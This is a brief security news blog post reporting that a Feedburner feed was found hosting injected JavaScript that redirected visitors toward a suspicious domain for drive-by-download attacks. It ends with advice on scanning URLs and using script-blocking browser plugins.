Feedburner Feed Rigged with Malicious JavaScript

Note: This post contains website URLs that may not be safe to visit, but are shared for educational purposes and have been modified to prevent accidental click-throughs. Do NOT visit the URLs.

Feedburner WarningIt appears that cybercriminals are abusing Feedburner in order to conduct drive-by-download attacks.

Zscaler researchers found malicious JavaScript on feeds.feedburner.com/bileblog containing an iFrame designed to redirect visitors to a series of booby-trapped websites.

Once a user visits the compromised Feedburner feed page, the JavaScript code will execute, injecting the iFrame and redirecting the user to an intermediate website before ultimately redirecting the user to fukbb[.]com.

Fukbb[.]com didn’t have any malicious content at the time of the report, but has been flagged for suspicious activity in the past. A VirusTotal scan of fukbb[.]com shows that the first time the domain was scanned was in July of 2013.

Zscaler ThreatLabZ reported the compromised page to Feedburner on 12/26/13. The malicious JavaScript is still present as of 1/2/14. Although the infection method is unclear, the ‘bileblog’ feed appears to be the only one hosting the malicious JavaScript code.

Some antivirus solutions may detect the malicious JavaScript code as JS/Exploit-Blacole.em.

Attacks involving malicious JavaScript code being injected into legitimate websites to push users towards drive-by-download attacks are becoming increasingly common. “Most of the time the infected sites haven’t specifically been targeted, but have become infected during larger attacks conducted using browser exploit kits designed to automate the infection of as many sites as possible. “ Pradeep Kulkarni explained on the Zscaler blog.

Although it may not always seem necessary, users are advised to scan URLs before visiting them – especially if the URL is suspicious in any way. Additionally, users may consider installing security browser plugins, like NoScript for FireFox or NotScript for Chrome to lessen the chances of a successful attack.

Like this post? Follow us online by liking us on Facebook, following us on Twitter (@sdpcfix), or circling us on Google+.